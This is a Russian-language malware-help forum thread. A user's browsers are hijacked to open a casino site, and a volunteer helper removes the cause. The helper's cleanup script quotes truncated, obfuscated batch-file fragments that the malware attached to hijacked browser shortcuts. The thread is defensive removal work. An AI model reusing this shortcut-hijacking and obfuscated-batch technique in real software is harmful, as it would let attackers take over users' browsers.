Показано с 1 по 7 из 7.

В обозревателях первой открывается страница он-лайн казино "Вулкан" (заявка № 195680)

  1. #1
    Junior Member Репутация
    Регистрация
    19.10.2015
    Сообщений
    16
    Вес репутации
    9

    В обозревателях первой открывается страница он-лайн казино "Вулкан"

    Добрый день! В момент скачивания музыки подцепилась "зараза". При открытии любого обозревателя (IE или Google) первой открывается страница он-лайн казино "Вулкан". В настройках браузеров ссылки на этот ресурс нет. На компьютере установлена ОС Windows 8.1 для одного языка 32-разрядная, антивирус Avast 11.1.2245. В результате проверки системы программой Avast, с загрузкой с диска DrWeb_LiveDisk с последними обновлениями, утилитой Лаборатории Касперского KVRT было обезврежено несколько вирусов, но проблема осталась. При подготовке файлов программа AVZ вылетает исполняя 3 скрипт, поэтому файл virusinfo_syscure.zip не создается. Два других требуемых файла прилагаю. Требуется помощь.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,458
    Вес репутации
    343
    Уважаемый(ая) Skvortsova, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    27,131
    Вес репутации
    847
    Сделайте лог AdwCleaner (by Xplode).

    Сделайте лог Check Browsers' LNK.
    WBR,
    Vadim

  5. Это понравилось:


  6. #4
    Junior Member Репутация
    Регистрация
    19.10.2015
    Сообщений
    16
    Вес репутации
    9
    Добрый день! См. логи
    Вложения Вложения

  7. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    27,131
    Вес репутации
    847
    Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".
    Код:
    >>> [script] "C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"           -> ["C:\ProgramData\sLkEiu\xCTRMirq0.bat"] -> chcp 1251 >NUL¶ set /p ynvJnwGYvHfp=< "%~dp0ynvJnwGYvHfp"¶ "T2dZV0llYg=="¶ set /p eUqhuTlkzAiiTI=< "%~dp0eUqhuTlkzAiiTI"¶ "bEdOdlZrdXdoak91"¶ set /p BxqAjEokaJGb=< "%~dp0BxqAjEokaJGb"¶ "dWpDTE9mVWdZdQ=="¶ set /p uDTmqScOzHHeOJw=< "%~dp0uDTmqScOzHHeOJw"¶ "ekREY2x5VE5YdEFva0M="¶ set /p fTEKWhCIEq=< "%~dp0fTEK (567 байт.) (MD5:EF2336C86F4240046C445FF09F8D8C28)
    >>> [script] "C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk"  -> ["C:\ProgramData\avefVEJ\IKi5.bat"] -> chcp 1251 >NUL¶ set /p oCCCRMiwu=< "%~dp0oCCCRMiwu"¶ "QnZJZ0haWUtFUFF2UGRp"¶ set /p nrauNFLIl=< "%~dp0nrauNFLIl"¶ "ZFlLQ3JxSFpBRA=="¶ set /p iVDZnNqI=< "%~dp0iVDZnNqI"¶ "UHBMeGh4aGxmcUw="¶ set /p zBxinv=< "%~dp0zBxinv"¶ "WVFPRVNvdWd0Tw=="¶ set /p McGTZku=< "%~dp0McGTZku"¶ "VlR3akNvamdjVUI="¶ chcp 866 >NUL¶ %o (347 байт.) (MD5:66FAD4882520A418B6DBDE877382C0F2)
    >>> [script] "C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Yandex.lnk"        -> ["C:\Users\1\AppData\Local\YiGHCvbDgZFG\TMrXhorvbw1.bat"] -> chcp 1251 >NUL¶ set /p YJbCUwtXvOkYB=< "%~dp0YJbCUwtXvOkYB"¶ "SEVSdk5aQw=="¶ set /p SeMRLIs=< "%~dp0SeMRLIs"¶ "T0J1Q0pWcERBa0Q="¶ set /p CCfVyHW=< "%~dp0CCfVyHW"¶ "RkhXVHRud2c="¶ set /p HDDqWc=< "%~dp0HDDqWc"¶ "c2JldnR6UHM="¶ set /p VUItHhzWMojwZvG=< "%~dp0VUItHhzWMojwZvG"¶ "Wkx5VFNGeHJr"¶ set /p AKhpKHBWs=<  (424 байт.) (MD5:24D1E1CC46AF95E5C209DBE4A0B36C42)
    >>> [script] "C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"           -> ["C:\ProgramData\sLkEiu\xCTRMirq0.bat"] -> chcp 1251 >NUL¶ set /p ynvJnwGYvHfp=< "%~dp0ynvJnwGYvHfp"¶ "T2dZV0llYg=="¶ set /p eUqhuTlkzAiiTI=< "%~dp0eUqhuTlkzAiiTI"¶ "bEdOdlZrdXdoak91"¶ set /p BxqAjEokaJGb=< "%~dp0BxqAjEokaJGb"¶ "dWpDTE9mVWdZdQ=="¶ set /p uDTmqScOzHHeOJw=< "%~dp0uDTmqScOzHHeOJw"¶ "ekREY2x5VE5YdEFva0M="¶ set /p fTEKWhCIEq=< "%~dp0fTEK (567 байт.) (MD5:EF2336C86F4240046C445FF09F8D8C28)
    >>> [script] "C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk"       -> ["C:\ProgramData\avefVEJ\IKi5.bat"] -> chcp 1251 >NUL¶ set /p oCCCRMiwu=< "%~dp0oCCCRMiwu"¶ "QnZJZ0haWUtFUFF2UGRp"¶ set /p nrauNFLIl=< "%~dp0nrauNFLIl"¶ "ZFlLQ3JxSFpBRA=="¶ set /p iVDZnNqI=< "%~dp0iVDZnNqI"¶ "UHBMeGh4aGxmcUw="¶ set /p zBxinv=< "%~dp0zBxinv"¶ "WVFPRVNvdWd0Tw=="¶ set /p McGTZku=< "%~dp0McGTZku"¶ "VlR3akNvamdjVUI="¶ chcp 866 >NUL¶ %o (347 байт.) (MD5:66FAD4882520A418B6DBDE877382C0F2)
    >>> [script] "C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk"          -> ["C:\ProgramData\avefVEJ\IKi5.bat"] -> chcp 1251 >NUL¶ set /p oCCCRMiwu=< "%~dp0oCCCRMiwu"¶ "QnZJZ0haWUtFUFF2UGRp"¶ set /p nrauNFLIl=< "%~dp0nrauNFLIl"¶ "ZFlLQ3JxSFpBRA=="¶ set /p iVDZnNqI=< "%~dp0iVDZnNqI"¶ "UHBMeGh4aGxmcUw="¶ set /p zBxinv=< "%~dp0zBxinv"¶ "WVFPRVNvdWd0Tw=="¶ set /p McGTZku=< "%~dp0McGTZku"¶ "VlR3akNvamdjVUI="¶ chcp 866 >NUL¶ %o (347 байт.) (MD5:66FAD4882520A418B6DBDE877382C0F2)
    >>> [script] "C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yandex\Yandex.lnk"    -> ["C:\Users\1\AppData\Local\YiGHCvbDgZFG\TMrXhorvbw1.bat"] -> chcp 1251 >NUL¶ set /p YJbCUwtXvOkYB=< "%~dp0YJbCUwtXvOkYB"¶ "SEVSdk5aQw=="¶ set /p SeMRLIs=< "%~dp0SeMRLIs"¶ "T0J1Q0pWcERBa0Q="¶ set /p CCfVyHW=< "%~dp0CCfVyHW"¶ "RkhXVHRud2c="¶ set /p HDDqWc=< "%~dp0HDDqWc"¶ "c2JldnR6UHM="¶ set /p VUItHhzWMojwZvG=< "%~dp0VUItHhzWMojwZvG"¶ "Wkx5VFNGeHJr"¶ set /p AKhpKHBWs=<  (424 байт.) (MD5:24D1E1CC46AF95E5C209DBE4A0B36C42)
    Отчёт о работе прикрепите.

    Очистите кэш и cookies-файлы браузеров и сообщите, что с проблемами.
    WBR,
    Vadim

  8. Это понравилось:


  9. #6
    Junior Member Репутация
    Регистрация
    19.10.2015
    Сообщений
    16
    Вес репутации
    9
    Спасибо!!! После удаления скриптов проблема исчезла.
    Вложения Вложения

  10. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    27,131
    Вес репутации
    847
    Запустите AdwCleaner и нажмите Деинсталлировать (Uninstall).

    Выполните рекомендации после лечения.
    WBR,
    Vadim

  11. Это понравилось:


Похожие темы

  1. Ответов: 3
    Последнее сообщение: 25.05.2015, 17:40
  2. Ответов: 7
    Последнее сообщение: 19.11.2014, 23:44
  3. Ответов: 11
    Последнее сообщение: 25.04.2014, 00:00
  4. Ответов: 1
    Последнее сообщение: 24.11.2013, 05:21

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01510 seconds with 17 queries